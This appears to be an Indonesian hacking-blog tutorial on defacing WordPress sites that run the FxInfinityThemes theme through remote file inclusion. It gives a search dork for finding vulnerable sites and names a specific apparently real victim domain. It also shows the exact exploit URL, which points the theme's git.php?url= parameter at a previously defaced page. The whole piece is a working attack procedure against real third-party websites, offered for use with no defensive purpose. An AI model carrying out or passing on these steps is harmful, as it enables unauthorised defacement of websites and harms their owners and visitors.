Remote File Inclusion
Hay all, balik lagi kita bahas deface lagi, dan pada pembahasan kali ini kita akan mencoba deface WordPress FxInfinityThemes. Ga tau juga ya ini deface atau bukan >_< tapi lumayan lah kalo mau soof gitu. Hati-hati dibaitin mastah-mastah tai ***. Berikut apa itu remote file inclusion.
Remote File Inclusion : A remote file inclusion (RFI) occurs when a filefrom a remote web server is inserted into a web page. This can be done on purpose to display content from a remote web application. But, it can also happen by accident, due to a misconfiguration of the respective programming language, wchich can lead to a RFI attack.
Ya gitulah, translate aja sendiri yak.
Tutorial
- Siapkan dulu web yang sebelumnya sudah kalian deface. Ini web yang udah di deface sebelumnya http://miserystation.com/
- Dorking di browser kesayangan kalian menggunakan dork berikut inurl:/wp-content/themes/fxinfinitytheme/
- Kan banyak tu target, pilih salah satu dan mimin ambil yang ini https://www.metatraderdemo.net/wp-content/themes/fxinfinitytheme/git.php?url=http://click1xxx.xyz/meta/https://pubs.acs.org/doi/abs/10.1021/jo00170a070
- Nah, itu yang mimin ambil keliatan gak tuh urlnya ada git.php?url= itu yang nanti diganti pake website hasil deface kalian.
- Hasilnya akan seperti ini https://www.metatraderdemo.net/wp-content/themes/fxinfinitytheme/git.php?url=http://miserystation.com/
- Dah kan? Berhasil tu bukti screenshot diatas.
Live Target :
0 Comments